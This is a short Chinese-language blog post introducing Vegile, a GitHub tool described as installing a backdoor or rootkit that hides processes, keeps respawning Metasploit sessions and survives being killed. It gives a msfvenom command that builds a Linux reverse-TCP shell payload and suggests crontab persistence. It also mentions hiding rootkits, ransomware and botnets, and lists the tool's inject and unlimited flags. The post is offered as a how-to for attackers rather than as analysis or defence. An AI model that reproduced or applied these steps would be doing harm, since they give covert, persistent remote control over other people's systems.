GitHub开源的项目Vegile
原理
这个工具将会设置你的后门/rootkit,它将隐藏你的spesisifc进程,在metasploit中无限制地产生会话,并且这一过程是透明的。后门即使被杀,也会重新运行。在运行另一个进程时总会有一个过程在待命,所以我们可以认为这个过程是不可改变的,就像“shell中的鬼”
- 现在我将使用msf命令中的
reverse_shell
来测试后门,我的后门针对的是linux,你也可以使用thefatrat
创建一个简单的后门。 msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
- 对于隐藏你可以使用rootkits,backdoor,ransom and botnet(脚本,python,perl,exe或者binary)
- 为了获得持久性,你可以使用crontab和xinit.d进入你的后门
命令
先拉取项目
git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile
参数
Vegile -i / --inject [backdoor/rootkit]
Vegile -u / --unlimited [backdoor/rootkit]
Vegile -h / --help
原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er